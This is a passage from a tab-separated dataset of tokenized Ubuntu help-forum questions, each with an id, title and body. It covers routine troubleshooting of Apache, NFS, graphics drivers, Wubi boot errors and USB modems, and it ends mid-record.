276354	apache2 wo n't start	i upgraded from ubuntu 10.04 server to ubuntu 12.04 server and things got messed up . after a while i got things to work . after a new installation of apache2 and mysql and phpmyadmin , apache2 wo n't start . this is the output i get when trying to start the service : * restarting web server apache2 syntax error on line 161 of /etc/apache2/apache2.conf : invalid command 'order ' , perhaps misspelled or defined by a module not included in the server configuration
276357	how to use proxy server	i wan na know to to setup proxy server in ubuntu 12.04 only to access internet . in windows i use freegate to access internet since all internet sites are blocked by fortiguard web filtering . is their is app or setting to bypass web filtering
276358	will new monitor fix choppy video ?	context i have an emachines computer i bought from walmart about 2-3 years ago . it came with windows 7 and everything was great . i 'm an html5 developer , and i do a lot of 2d and 3d development , both with html5 's 2d canvas rendering context and with webgl . i had never had any performance problems running on windows 7 . recently i decided to get rid of windows , and i installed ubuntu 12.04 on it . the video card is an nvidia geoforce 6150se . here 's my frustration and question : the default graphics driver ( nvidia accelerated graphics driver ( post-release updates ) ( version 173-updates ) works greats ( smooth playback and everything ) . the problem : it wo n't run webgl no matter what i try . if i install any other driver ( version current , version current-updates , etc . ) , i can get webgl to play , but any video playback or html5 's request animation frame is super choppy . i 've tried every last suggestion i found online ( i 've been trying to get this to work for a few weeks now ) . the monitor i use is a bit dated . it 's a samsung syncmaster 740b . question : if i buy a new monitor and use it with the latest graphics card driver i have , is the choppiness likely to go away ?
276368	thread works only on gui events - pygtk	i am developing a multithreaded application in pygtk using quickly and stuck with threads . so i am experimenting with various possibilities and found out that my thread work only when i do something in the gui here is my code t = threading.thread ( target=self.calc , args= ( treeiter ) ) t.daemon = true t.start ( ) def calc ( self , treeiter ) : store=self.builder.get_object ( 'liststore1 ' ) per=0 while 1 : print `` calcing and changing percent , per= '' +str ( per ) tore.set_value ( treeiter,4 , str ( int ( per ) ) + '' % '' ) per+=1 time.sleep ( 1 ) i am trying to update the value in a liststore by thread but it only get update when i click some button or some other gui events why is that so ? why is the thread not running in the background ?
276369	python venv not working	i am running ubuntu 12.10 that has python 2.7 as its default . i have installed python 3.3 in /opt/python3.3 ( using ./configure -- prefix=/opt/python3.3 ) . my problem is with the virtual environment . created one in ~/python33 and activated it . now after downloading , when i run distribute_setup.py within the venv , the installation defaults to 2.7 . and this happens with all the subsequent easy_installs . for reference , here are the final few prompts : extracting distribute-0.6.35-py2.7.egg to /usr/local/lib/python2.7/dist-packages ... installed /usr/local/lib/python2.7/dist-packages/distribute-0.6.35-py2.7.egg i created a symlink pointing to /opt/python3.3/bin/python3 as ~/bin/python33 and tried running distribute_setup.py with this executable . i tried this from within the venv and without . : ) . but this is what i get for both : extracting in /tmp/tmpl3ackg traceback ( most recent call last ) : file `` distribute_setup.py '' , line 546 , in < module > sys.exit ( main ( ) ) file `` distribute_setup.py '' , line 543 , in main return _install ( tarball , _build_install_args ( options ) ) file `` distribute_setup.py '' , line 76 , in _install tar = tarfile.open ( tarball ) file `` /opt/python3.3/lib/python3.3/tarfile.py '' , line 1571 , in open raise readerror ( `` file could not be opened successfully '' ) tarfile.readerror : file could not be opened successfully and got the same result with : sudo /opt/python3.3/bin/python3 distribute_setup.py ~/python33/lib/python3.3/site-packages is empty . thanks for your help .
276372	what is the difference between ubuntu for android and ubuntu touch ?	since both are mobile os why name them differently ? or am i missing something here ?
276374	is ecryptfs-setup-swap persistent ?	i have what i think is a quick question : is running ecryptfs-setup-swap on a system that did n't have home-directory or swap encryption enabled when it was installed persistent ? the man page at http : //manpages.ubuntu.com/manpages/precise/man1/ecryptfs-setup-swap.1.html states that ecryptfs-setup-swap `` will detect existing swap partitions or swap files , and encrypt them , using cryptsetup . '' i do n't understand whether ecryptfs-setup-swap needs to be run every time the system is booted , or if it just needs to be run once to make a permanent change to how swap space is handled by the system . if the change is permanent , is it permanent for all users on the system , or just the one that runs ecryptfs-setup-swap ( i may be confused about how swap space works in general , i realize ) ? to be clear , i do understand that i also need to run ecryptfs-migrate-home on the system to encrypt the home directory for my user account , and that that change will be persistent . i 'm just confused about how swap space is handled . i would appreciate any information to help me understand better ! thank you ! p.s . a tutorial at http : //bodhizazen.net/tutorials/ecryptfs states that after using ecryptfs-setup-swap , `` a new entry for your encrypted swap is automatically generated in /etc/fstab , but unfortunately as of this writing , the old entry is not removed and you must remove it manually ( or suffer error messages when you boot ) . '' is that still true ? full disclosure : i have also posted this question at http : //superuser.com/questions/576097/is-ecryptfs-setup-swap-persistent . once the question is answered either here or there , i will take down the unanswered instance .
276379	i signed into the keyring thing , and now chrome crashes as soon as it opens .	i decided to start using ubuntu one again , and it asked for my password to that obnoxious keyring thing . when that pops up when i start chrome , i always click cancel , but ubuntu one would n't take that for an answer , so i entered my password , and got into ubuntu one . now whenever chrome opens , it crashes right away . what 's going on ? i 'm typing this from my windows partition . i 've had this problem before , but i could n't link it to anything except for chrome 's sync feature , so i did n't enable that again , but i 've been using sync for a while now , and this has only happened after entering my password into the keyring for the first time . how do i stop this , and how do i remove that awful keyring rubbish ?
276381	can i tar the whole system , clear everything and untar it back ?	i have to do the whole system cleanup , deleting and recreating all partitions . i 'm wondering if i could simply tar all my / ( excluding proc , sys and mnt ) into archive and then untar it into clear partition from livecd after this full cleanup , reinstall grub and have my system working as before . would it work ? if not , what would you recommend ? probably , same troubles with partitions in system itself ? ( fstab is the simplest example )
276386	ubuntu one : `` the user cancelled a prompt . ''	every time that i try to sign in to ubuntu one , it tells me : '' an application wants to create a new keyring called 'default ' . choose the password you want to use for it . '' i set the password to nothing , confirm that i was to use unsafe storage , and then i 'm not signed in , with ubuntu one telling me , the user cancelled a prompt how do i get rid of this so i can use ubuntu one ?
276387	seem /etc/exports can only export one directoy	on the nfsserver ( called ubuntu ) the /etc/exports contains /media/ext 192.160.1.0/24 ( rw ) /home/file 192.160.1.0/24 ( rw ) on the client machine sudo mount -t nfs ubuntu : /home/file /mnt was executed , however when executed ls /mnt , the contents were from /media/ext . although only one nfs mount was executed , on the server /var/lib/nfs/rmtab contains 192.160.1.103 : /media/ext:0x00000001 192.160.1.103 : /home/file:0x00000001 why was ubuntu : /media/ext was mounted instead of ubuntu : /home/file ? if the order in /etc/exports reverse , as 192.160.1.103 : /media/file:0x00000001 192.160.1.103 : /home/ext:0x00000001 then /media/file was mounted . it seem the exportfs only export the first entry please help thanks
276388	installation ubuntu on hp z1 workstation ( wm431ea )	how to install ubuntu on hp z1 workstation ? i need instruction what i need change in bios for installing ubuntu on hp z1 . i tryed all combination with bios and ubuntu ( 12.10 , 12.04 , 11.10 , 11.04 , 11.10 ) but after selecting menu point `` install ubuntu '' , i have just black screen . tech info about workstation is : intel xeon e3-1245 3.30ghz hp 8gb ( 2x4gb ) ddr3-1600 ecc ram ssd ocz vector 256g sata3 ( vtr1-25sat3-256g ) intel hd graphics p3000
276392	dbus : where to get started ?	many every day actions in ubuntu can be done easily from terminal using dbus . the main advantage is it can be done exactly the gui does , using a one liner , such as change brightness , copy file , etc . for example to decrease brightness standard terminal method is xbacklight +30 % # -30 % while dbus method : dbus-send -- session -- print-reply -- dest= '' org.gnome.settingsdaemon '' /org/gnome/settingsdaemon/power org.gnome.settingsdaemon.power.screen.setpercentage uint32:30 to copy file cp ./a/source ./b/destination and qdbus org.gnome.nautilus /org/gnome/nautilus org.gnome.nautilus.fileoperations.copyfile `` file : ///source/directory '' `` * '' `` file : ///destination/directory '' `` '' in qdbus graphical indicators are displayed with speed and canel buttton . so the dbus is something interesting and i really want to learn dbus stuff . please guide my by providing some ebook , links , etc .
276394	number of process id	why number of my process id reach to 32433 ? pid tty time cmd 1 ? 00:00:01 init 2 ? 00:00:00 kthreadd 3 ? 00:00:45 ksoftirqd/0 5 ? 00:00:00 kworker/0:0h 8 ? 00:00:02 migration/0 9 ? 00:00:00 rcu_bh 10 ? 00:01:12 rcu_sched 11 ? 00:00:01 watchdog/0 12 ? 00:00:01 watchdog/1 13 ? 00:00:03 migration/1 14 ? 00:00:47 ksoftirqd/1 16 ? 00:00:00 kworker/1:0h 17 ? 00:00:00 khelper 18 ? 00:00:00 kdevtmpfs 19 ? 00:00:00 netns 20 ? 00:00:00 bdi-default 21 ? 00:00:00 kintegrityd 22 ? 00:00:00 kblockd 24 ? 00:00:00 ata_sff 25 ? 00:00:00 khubd 26 ? 00:00:00 md 27 ? 00:00:00 devfreq_wq 29 ? 00:00:00 khungtaskd 30 ? 00:00:50 kswapd0 31 ? 00:00:00 ksmd 32 ? 00:00:00 khugepaged 33 ? 00:00:00 fsnotify_mark 34 ? 00:00:00 ecryptfs-kthrea 35 ? 00:00:00 crypto 46 ? 00:00:00 kthrotld 50 ? 00:00:00 binder 69 ? 00:00:00 deferwq 70 ? 00:00:00 charger_manager 251 ? 00:00:00 firewire 261 ? 00:00:00 scsi_eh_0 262 ? 00:00:00 scsi_eh_1 263 ? 00:00:00 scsi_eh_2 264 ? 00:00:00 scsi_eh_3 330 ? 00:00:08 jbd2/sda1-8 331 ? 00:00:00 ext4-dio-unwrit 334 ? 00:00:02 kworker/0:1h 339 ? 00:00:00 kworker/1:1h 418 ? 00:00:00 upstart-udev-br 420 ? 00:00:00 udevd 659 ? 00:00:20 kworker/0:0 719 ? 00:00:00 kworker/u:0 722 ? 00:00:00 irq/47-mei 727 ? 00:00:00 kworker/u:2 732 ? 00:00:00 kworker/0:1 733 ? 00:00:00 kworker/u:1 734 ? 00:00:00 kworker/0:2 736 ? 00:00:00 kworker/u:3 758 ? 00:00:00 konsole 761 pts/2 00:00:00 bash 774 ? 00:00:00 kmemstick 775 ? 00:00:00 kpsmoused 778 ? 00:00:00 cfg80211 785 ? 00:00:00 pccardd 787 ? 00:00:00 r592_io 794 ? 00:00:00 kvm-irqfd-clean 797 ? 00:00:00 kworker/u:1h 801 ? 00:00:00 r852 813 ? 00:16:01 irq/48-iwlwifi 823 pts/2 00:00:00 ps 825 ? 00:00:00 ktpacpid 846 ? 00:00:00 hd-audio0 860 ? 00:00:00 iwlwifi 883 ? 00:00:19 rsyslogd 888 ? 00:00:08 flush-8:0 916 ? 00:00:00 upstart-socket- 1010 ? 00:00:27 dbus-daemon 1031 ? 00:00:00 modem-manager 1054 ? 00:00:02 cupsd 1063 ? 00:00:00 bluetoothd 1067 tty4 00:00:00 getty 1078 tty5 00:00:00 getty 1079 ? 00:00:00 krfcommd 1092 tty2 00:00:00 getty 1093 tty3 00:00:00 getty 1094 ? 00:00:00 kdm 1096 tty6 00:00:00 getty 1104 ? 00:00:00 acpid 1106 ? 00:00:00 avahi-daemon 1107 ? 00:00:00 avahi-daemon 1109 ? 00:00:00 cron 1110 ? 00:00:00 atd 1119 ? 00:00:36 irqbalance 1174 ? 00:00:25 networkmanager 1177 tty8 01:11:24 xorg 1183 ? 00:00:02 whoopsie 1329 ? 00:00:00 polkitd 1344 tty1 00:00:00 getty 1349 ? 00:00:03 wpa_supplicant 1350 ? 00:00:00 kdm 1447 ? 00:00:00 console-kit-dae 1520 ? 00:00:00 startkde 1574 ? 00:00:00 ssh-agent 1575 ? 00:00:06 gpg-agent 1578 ? 00:00:00 dbus-launch 1579 ? 00:02:28 dbus-daemon 1613 ? 00:00:18 udisks-daemon 1614 ? 00:00:00 udisks-daemon 1645 ? 00:00:00 start_kdeinit 1646 ? 00:00:01 kdeinit4 1647 ? 00:00:02 klauncher 1649 ? 00:00:56 kded4 1654 ? 00:00:01 bluedevil-helpe 1656 ? 00:00:01 obex-data-serve 1659 ? 00:00:00 upowerd 1838 ? 00:00:02 kglobalaccel 1840 ? 00:00:02 kwalletd 1843 ? 00:00:01 kactivitymanage 1845 ? 00:00:00 kwrapper4 1846 ? 00:00:02 ksmserver 1849 ? 00:19:45 kwin 1857 ? 00:00:06 knotify4 1860 ? 00:35:52 plasma-desktop 1863 ? 00:00:01 kuiserver 1867 ? 00:02:12 ksysguardd 1874 ? 00:00:06 kaccess 1882 ? 00:00:13 nepomukserver 1883 ? 00:00:00 xsettings-kde 1889 ? 00:04:16 nepomukservices 1891 ? 00:00:35 krunner 1896 ? 00:28:18 pulseaudio 1898 ? 00:00:01 rtkit-daemon 1904 ? 00:00:01 akonaditray 1906 ? 00:00:35 nepomukcontroll 1911 ? 00:18:48 virtuoso-t 1912 ? 00:00:11 kmix 1914 ? 00:00:00 gconf-helper 1916 ? 00:00:00 gconfd-2 1929 ? 00:00:02 zeitgeist-datah 1930 ? 00:00:02 deja-dup-monito 1940 ? 00:00:03 python 1946 ? 00:00:01 polkit-kde-auth 1947 ? 00:00:04 klipper 1956 ? 00:00:05 zeitgeist-daemo 1964 ? 00:00:06 zeitgeist-fts 1973 ? 00:00:01 gvfsd 1974 ? 00:00:00 cat 1987 ? 00:00:00 gvfs-gdu-volume 1991 ? 00:00:00 gvfs-fuse-daemo 1997 ? 00:00:00 gvfs-afc-volume 2002 ? 00:00:00 gvfs-gphoto2-vo 2046 ? 00:00:01 ubuntuone-syncd 2084 ? 00:00:01 gnome-keyring-d 2091 ? 00:00:00 nepomukservices 2092 ? 00:01:21 nepomukservices 2093 ? 00:00:01 nepomukservices 2094 ? 00:02:58 nepomukservices 2145 ? 00:00:00 dconf-service 2151 ? 00:00:00 gvfsd-metadata 8161 ? 00:00:00 kio_http_cache_ 9088 ? 00:00:00 kworker/u:2h 10996 ? 00:00:00 dbus-launch 10997 ? 00:00:00 dbus-daemon 11002 ? 00:00:00 kdeinit4 11005 ? 00:00:00 klauncher 11008 ? 00:00:04 kded4 11327 ? 00:00:02 knotify4 11331 ? 00:00:00 gvfsd 11333 ? 00:00:00 gvfs-fuse-daemo 24083 ? 00:00:00 gnome-screensav 27181 ? 00:00:00 gvfsd-trash 27773 ? 00:00:00 at-spi-bus-laun 30775 ? 00:00:00 update-apt-xapi 30793 ? 00:00:00 gvfsd-http 31489 ? 00:01:54 kworker/1:1 32415 ? 00:00:00 kworker/1:0 32416 ? 00:00:00 hci0 32417 ? 00:00:00 hci0 32420 ? 00:00:00 udevd 32421 ? 00:00:00 udevd 32427 ? 00:00:00 bluedevil-monol 32430 ? 00:00:00 dhclient 32433 ? 00:00:00 dnsmasq
276395	fan error when booting in ubuntu 12.04	everything went normally , when yesterday night i was turning off my thinkpad laptop . i did nothing special . today , when i tried to start using it , all i get is an error message `` fan error '' and computer turns off . so , after boot screen , just `` fan error '' and that 's it . what can i do ?
276398	checking version of package without installing	i am undecided about whether to install the default-jdk java development package or the tarball from sun . how do i check the version information in the default-jdk or other package without actually installing it and all its dependencies ? thanks , john goche
276400	pasting content in root should ask for password in nautilus	i am aware the following actions can be done when i open nautilus as root , but is there a way to get nautilus to prompt for admin password when copying items ( files , folders ) into root folders from the default user account ? like a small script or something ? it is for usability , easier for novice users . : )
276402	vlc no sound after pause	i am using vlc 2.0.5 , it fails to produce sound after i press pause the video . it gets back after changing the audio settings or restarting the video
276406	problem with apache2 connecting to database	i installed apache2 from this post : http : //www.howtoforge.com/installing-apache2-with-php5-and-mysql-support-on-ubuntu-12.04-lts-lamp then i want to put my website files and database i copied website files and put it on www path . then , create database and import it [ database.sql ] when i enter website [ http : //localhost/website ] display [ error ] my config file : < pre > // information $ server = `` localhost '' ; $ username = `` root '' ; $ password = `` root '' ; $ dbname = `` wecg '' ; // connect $ connectdb = mysql_connect ( $ server , $ username , $ password ) or die ( `` error '' ) ; $ selectdb = mysql_select_db ( $ dbname , $ connectdb ) or die ( `` error '' ) ; ? >
276407	how to develop app that starts automatically and always runs in background	i 'm developing my first application for ubuntu , and part of the apps functionality will involve displaying notifications based on dates that are in a sqlite database . how can i get the app to automatically perform a task every day at certain times , without the user having to run the app . so basically i would need the app to always run in the background , i think ? ( i 'm using python and gtk+3 ) thank you !
276408	what alternatives to nautilus exist which are more responsive ?	i like nautilus , but it suffers from lag when navigating between folders . i estimate the delay at somewhere between 300ms-800ms . not much , but enough to notice and feel sluggish compared to windows explorer ( running on windows 7 on the same machine on a different disk ) . are there alternatives that will respond more quickly ? n.b . i 'm running 12.10 . the ubuntu partition is on an ssd while the win7 partition is on an hdd , so i find the difference in responsiveness particularly strange .
276413	control mouse with keyboard and web browsing	i have lost my mouse functionality , and i have to work without it on my ubuntu pc for a couple of days . i am ok with doing my stuffs without it on my computer . but i 'm having no good time with web browsing at all . if i want to select a link i have to press tab several times , if i control mouse with numpad then mouse moves really really slow ( and it is useless ) . so , at the moment i do my stuffs on my pc and do web browsings with my laptop . is there any way to solve this ? i am using ubuntu 12.10
276417	ca n't get the desired speed from the main server	i usually got 40-50 kb/s speed for downloading updates from ubuntu main server . but for a while now , i 'm not getting the desired speed . it 's now came down to 4-5 kb/s . but when i switched to server for bangladesh ( i 'm a bangladeshi ) , i got good speed ( as of mentioned earlier ) . now what 's the problem here ? why i 'm not getting the same speed as i used to get earlier ?
276418	ca n't update ubuntu 12.04 - failed to fetch repository info	i have a freshly installed 12.04 . running the update manager gives me this : i even changed my update server ( by selecting `` select best server '' ) . checking around the net gave me no solutions . i have also seen similar questions around but none helped . updating from terminal gives me this my sources.list file
276419	ubuntu touch external usb hard drives and gaming	i would like to know if ubuntu touch will allow to connect several usb devices to phone as external hard drives , keyboard and mouse . the idea is use the phone as a desktop computer , even for 3d gaming ( with low graphic settings ) thank you ! : )
276421	autocomplete on partial matches in the middle of a filename in terminal ( dash/bash )	i have a bunch of directories : 20130118-cars_directory 20130118-bikes_directory 20130218-planes_directory 20130228-scooters_directory is there any way to change directories in the manner of typing a partial match in the middle of the command . ideally , something in the style of cd *bikes* < tab > , and have dash autocomplete the rest ?
276423	could n't install inside windows 8	i 've boot with ubuntu 12.10 boot able disk . i 've selected install inside windows option . pc has been restarted . then my windows 8 started normally . but , the installation did n't started .
276425	asus xtion pro live not working with xhci_hcd	i have a samsung np350v5c laptop ( with core i5-3210m cpu ) with two usb2.0 and two usb3.0 ports . the os is : $ uname -a linux pe 3.5.0-26-generic # 42-ubuntu smp fri mar 8 23:18:20 utc 2013 x86_64 x86_64 x86_64 gnu/linux i have an asus xtion pro live camera connected to a usb 2.0 port . this does not work . the problem seems to lie here ( using xhci_hcd , `` not enough bandwidth '' , see below ) : $ dmesg ... . [ 3162.597428 ] usb 3-3 : new high-speed usb device number 2 using xhci_hcd [ 3162.617432 ] usb 3-3 : new usb device found , idvendor=1d27 , idproduct=0600 [ 3162.617440 ] usb 3-3 : new usb device strings : mfr=2 , product=1 , serialnumber=0 [ 3162.617444 ] usb 3-3 : product : primesense device [ 3162.617447 ] usb 3-3 : manufacturer : primesense [ 3162.617912 ] xhci_hcd 0000:00:14.0 : not enough bandwidth . proposed : 1663 , max : 1607 [ 3162.617920 ] xhci_hcd 0000:00:14.0 : not enough bandwidth [ 3162.617933 ] usb 3-3 : ca n't set config # 1 , error -12 on another laptop ( lenovo , same cpu , also ubuntu 12.10 but 32bit ) , ehci_hcd is used , and there the camera works fine . so , the problem seems to be xhci_hcd . is there any fix for that problem or the possibility to force using ehci_hcd ?
276429	ca n't open ubuntu : try ( hd0,0 ) : fat32	i installed ubuntu 12.10 using wubi ( by downloading wubi and placing it in the same directory of iso file of ubuntu ) and it installed properly and asked for a reboot . when i clicked on a reboot and the computer rebooted , i got two choice - windows xp and ubuntu . but when i chose ubuntu , it did not open . instead a message appeared : try ( hd0,0 ) : fat32 i pressed alt+ctrl+delete and again chose ubuntu , again the same problem . i uninstalled ubuntu and installed it again . but again the same problem . : ( what should i do ? please help me .
276430	grafics on thinkpad r50e	after installing ubuntu 12.04 lts on a thinkpad r50e , there is no graphics driver , seems to me . the display works , but in a magenta-red mode , video is yellowish , youtube has no problem . in details , there is no graphics driver .
276432	configure a domain alias	how do i configure a domain alias in ubuntu ? i have a server called example.com which has a git running on port 4321 port 4321 is not visible to the outside world . so from machine1 i use ssh to connect to example.com forward port 4321 to localhost i.e . ssh example.com -l4321 : localhost:4321 from machine i would like execute a command : git clone ssh : //example.com:4321/myproject is there a way of making example.com point to localhost on machine one ? so that the above git command behaves as though it was the following command : git clone ssh : //localhost:4321/myproject i do n't have any services listening on port 4321 on the local machine .
276434	program to play magic : the gathering	what program does people use to play magic : the gathering on ubuntu , against human players , for free ? none of the programs i 've tried works . this is what i 've found so far . i 'll link to the projects later : forge : written in java . looks and works amazing , but is only single player . it 's almost as good as wtc 's official modo client . mage : written in java . has online multiplayer support . i can get it to start , but the interface is so flaky and weird that i dont understand how to play a duel or build a deck .
276435	map a key to open terminal and execute commands	i want to map a key , say ctrl-shift-m to open a terminal , ssh into the mailhost , open pine and go into the compose mail pane . i already have ssh-key setup so i dont have to type my password while doing ssh , so that is not an issue .
276437	which driver ( and ppd version ) is my printer using ?	as printing is sometimes unusually slow on my system , i 'd like to check which driver my printer is using . i 'm not sure if the driver version and the ppd version amount to the same thing ; if you know the difference , plz briefly explain . neither http : //localhost:631/ nor the standard printing config gui seem to be offering any insights re driver / ppd version numbers .
276442	certain keys on my keyboard click other keys	for example , when i press backspace , f7 triggers . t also triggers it . this did not happen in windows 8 . please help . i 'm using a generic keyboard by ativa .
276443	minimize tool tip not disappearing	i 'm using ubuntu 12.04 lts . the tool tips for the minimize button do not disappear when a window is maximized . the problem happens when the mouse pointer hovers over the minimize button while the window is maximizing . the solution i 'm using now is to not let the pointer near the minimize button . is there any way to avoid this ? may be increase the amount of time required for a tool tip to appear . or to remove tool tips for these buttons , as they 're pretty self explanatory .
276451	ubuntu does n't recognise my external monitor	i was trying to plug in an external monitor ( dell u2312hm ) in my dell xps 15 laptop , but all i see is a black screen ( on the external monitor , my normal screen is fine ) . when i open settings , it shows no sign of the monitor whatsoever . pressing 'detect displays ' does nothing . does anyone have a clue of what 's going on here ? i 'm a bit of a newbie , so if you want more information , please ask .
276452	install ubuntu on laptop with windows 8 32bit	i saw in the instructions that if i wanted to install ubuntu on my pc wiht withdows 8 i should download the 64 bit version . my laptop is an older 32 bit laptop that i have put windows 8 on . should i use the 32 bit version of ubuntu instead ? i have installed it to a usb drive and i see on there where i can install it with my current os but will this work with win 8 ? thanks .
276465	try ( hd0,0 ) ntfs5 error while booting ubuntu installed as wubi	i have installed ubuntu 12.10 using wubi installer . when i boot ubuntu from boot menu then it shows the following and it sticks there forever : try ( hd0,0 ) : ntfs5 : what 's the problem and how do i solve it ?
276468	how to keep gallium 0.4 ati drivers from live usb ?	for some reason , my ati radeon hd 6850 ( known as amd barts ) only seems to work fine when i 'm in a live usb test environment . the driver 's named `` gallium 0.4 on amd barts '' , and whenever i finish installing the os and reboot into its proper environment , i 'm unable to log in due to a glitchy screen . something happens in the process of testing the os and installing it that changes the xorg/gallium drivers . what can i do to ensure the same performance as i have in the live usb environment ? i tried downloading the proprietary catalyst drivers , but they give me a myriad of other problems . i 'm on ubuntu 12.04 ( x64 ) .
276469	google chrome in kubuntu does not use file manager to show files ?	every time i try to show a file i have downloaded file with google chrome in dolphin , it 's opened in a webpage like this : any idea on how i can resolve this issue ?
276470	how to create a bootable usb stick on ubuntu	in here says i need to search 'startup disk creator ' and i search but i dont find enything.. what to do ? edit ok thanks to you i found the file but now every time i put a 'iso ' file it says 0.0b ( like its not weigh any.. ) what to do now :
276475	ubuntu 12.10 does n't boot after grub menu	i have ubuntu 12.10 installed on a lenovo sl-510 laptop . previously i had a boot issue which resulted in a blank purple screen , that was solved using boot-repair to reinstall grub . right now it once again fails to boot . selecting ubuntu in the grub menu results in an empty screen with a command line cursor in the upper left corner . before this problem started , i got a scheduled updates notification , but it failed to install for some reason . this may or may not be relevant , but when the notification popped up , transmission bittorrent client stopped downloading and wrote that the disk is write-protected .
276477	how to deactivate kernel modules `` firewire_ohci '' and `` firewire_core '' ?	my computer currently uses the kernel modules firewire_ohci and firewire_core . i do n't want them . i blacklisted them , but they still load after any reboot . how can i deactivate them ?
276478	bluetooth keyboard and mouse problem	i am brand new to ubuntu - never used it before . i have created a dvd to run ubuntu from but when i select boot ( ubuntu ) from cd on my win xp machine the mouse and keyboard do not work once ubuntu starts . i have tried using the locate buttons to no avail .
276484	how to install local applications in ltsp thin clients ?	i 've configured a ltsp server at home and built the thin client . though , i 'd now like to know how to add local applications to the thin client , namely chromium-browser and emacs24 .
276487	share ubuntu between two computers and explore ubuntu	i have a ubuntu 12.04 using the full hard disk in my laptop and a wubi ubuntu 12.04 using 30 gb in my desktop . now i want to explore the networking features of ubuntu . like telnet and ssh . cli etc etc to become a programmer.as i am a beginner i have no idea where should i start specially for using the feature so that i can control my desktop through my laptop.or else , how can i setup one as server and other as a user . to be straightforward i am reading the book a practical guide to ubuntu by sobell and many feature of that book requires at least two pc 's with networking support that is remote computer.i have a cat 4 ethernet cable but donât know what to do.so if anyone can point out from where to start and give the useful links it would be very helpful . thanks !
276492	how to remove application installed from source code	i believe this is probably a simple or even stupid question , but i did not found an answer for i am a beginner of ubuntu . i installed my application by compiling and running the source code like : ./configure make make install now , i realized what i installed is a newer and unstable version . so , i need to re-install a stable version which is a litte older . i have the source code ready in hand , then what should i do next ?
276493	keyboard not working on lg laptop	i have just installed ubuntu 12.10 on my lg s900 laptop ( dual boot with windows 7 ) . but when i try to type something with the keybaord nothing happens ( but the touchpad works ) . the keyboard did not work during the installation but i could use onboard to finish it . any suggestion on how i can get the keyboard to work ?
276498	ubuntu 12.10 damaged : access to partitions and internet connection are lost	my ubuntu 12.10 is damaged . after i log in , the very right menu ( of users , shutdown , etc . ) does n't have any item . the internet connection does n't establish and the hard disks do n't appear while i still can access file system . this happened after i executed a set of new commands ( to get hadoop working ) and restarted . i found that sudo command is lost because one of the commands that i entered changed the ownership of opt/bin/sudo from the root . i fixed that by giving back opt/ the right permissions but the system is still damaged . can i do some sort of repair ? or how to fix that before thinking of reinstalling ?
276503	no sound on hdmi through a pioneer vsx-527 , works if connected directly to the tv	i have a htpc with an intelhd 4000 chip . the hdmi output is connected to a pioneer vsx-527 amp which in turn is connected via hdmi to my samsung hdtv . i previously had windows7 installed on the htpc and everything worked , but since i 'm a long time linux user i 'm not comfortable using windows , so i decided to install ubuntu 12.10 . the problem is that with this setup i have no audio ( the video displays perfectly ) . if i connect the htpc directly to the tv the audio works perfectly . i tried all the tips i found online but with zero results . any tips ?
276505	relating to permissions	i am unable to create a folder in `` www '' folder for php in ubuntu 12.04 file system directory . could you please help me to solve this problem ?
276509	change gsettings without running x and unity	i am trying to change some gconf settings in ubuntu 12.10 . i would like to change the lightdm greeter background . i have discovered that while logged in to unity as a user while running x server , i am able to do this with : sudo xhost +si : localuser : lightdm gsettings set com.canonical.unity-greeter background `` '/usr/share/backgrounds/micros-background.png ' '' the problem is that this requires me to login as a user under x . so that entire window manager needs to be running . but i want to use chroot to change these settings without any x server running . i just want to mount the partitions and change gsettings without having the full window manager running . is there a way to directly change gsettings without being logged into x and unity ? or alternatively ... is there a way to bring up the x server and unity in the background so that i can make the changes without having a full windowed display come up on my monitor ?
276511	how run c++ in geany ubuntu 12.10	i want run c++ in geany , but i got a problem . before i run pascal but can not run . then i installed fpc success run fine . and i run c++ , appear error in terminal : ./geany_run_script.sh : 5 : ./geany_run_script.sh : ./untitled : not found -- -- -- -- -- -- -- -- -- ( program exited with code : 127 ) press return to continue i wanted to ask , how to run the c++ in geany ? is there any additional plugin for my problem ? please help me .
276514	could not run hauwei e173 on 12.10 using networkmanager ( even from trunk )	i am trying to run huawei e173 device on ubuntu 12.10 . first of all i have tried running it on raw ubuntu ( installed via wubi ) without any changes . device was detected at lsusb as bus 003 device 004 : id 12d1:1c05 huawei technologies co. , ltd. e173s 3g broadband stick ( modem on ) but i cant find it at any /dev/ttyu* path ( as i expected at ttyusb0 , ttyusb1 ... ) . then i tried using trunk networkmanager and modemmanager , same results . device was listed on lsusb ( that mean usb-modechange is working correctly ) . here is some output that might help you to investigate problem with me : syslog output : mar 31 16:23:28 ubuntu kernel : [ 1297.127008 ] usb 3-1 : > new high-speed usb device number 6 using xhci_hcd mar 31 16:23:28 ubuntu kernel : [ 1297.377948 ] usb 3-1 : > new usb device found , idvendor=12d1 , idproduct=1c05 mar 31 16:23:28 ubuntu kernel : [ 1297.377954 ] usb 3-1 : > new usb device strings : mfr=2 , product=1 , serialnumber=0 mar 31 16:23:28 ubuntu kernel : [ 1297.377958 ] usb 3-1 : > product : huawei mobile mar 31 16:23:28 ubuntu kernel : [ 1297.377961 ] usb 3-1 : > manufacturer : huawei mar 31 16:23:28 ubuntu mtp-probe : checking bus 3 , device 6 : `` /sys/devices/pci0000:00/0000:00:1c.3/0000:05:00.0/usb3/3-1 '' mar 31 16:23:29 ubuntu kernel : [ 1297.561484 ] usb 3-1 : > bad cdc descriptors mar 31 16:23:29 ubuntu kernel : [ 1297.561681 ] usb 3-1 : > bad cdc descriptors mar 31 16:23:29 ubuntu kernel : [ 1297.561880 ] usb 3-1 : > bad cdc descriptors mar 31 16:23:29 ubuntu kernel : [ 1297.562033 ] usb 3-1 : > bad cdc descriptors mar 31 16:23:29 ubuntu kernel : [ 1297.562168 ] usb 3-1 : > bad cdc descriptors mar 31 16:23:29 ubuntu mtp-probe : bus : 3 , device : 6 was not an mtp device mar 31 16:23:29 ubuntu kernel : [ 1297.562268 ] usb 3-1 : > bad cdc descriptors i have also found something strange , after first plug in huawei e173 device i found some extra logs ( from usbcore ) : mar 31 17:03:37 ubuntu kernel : [ 109.607001 ] usb 3-1 : > new high-speed usb device number 3 using xhci_hcd mar 31 17:03:37 ubuntu kernel : [ 109.626461 ] usb 3-1 : > new usb device found , idvendor=12d1 , idproduct=1c05 mar 31 17:03:37 ubuntu kernel : [ 109.626467 ] usb 3-1 : > new usb device strings : mfr=2 , product=1 , serialnumber=0 mar 31 17:03:37 ubuntu kernel : [ 109.626471 ] usb 3-1 : > product : huawei mobile mar 31 17:03:37 ubuntu kernel : [ 109.626474 ] usb 3-1 : > manufacturer : huawei mar 31 17:03:37 ubuntu mtp-probe : checking bus 3 , device 3 : `` 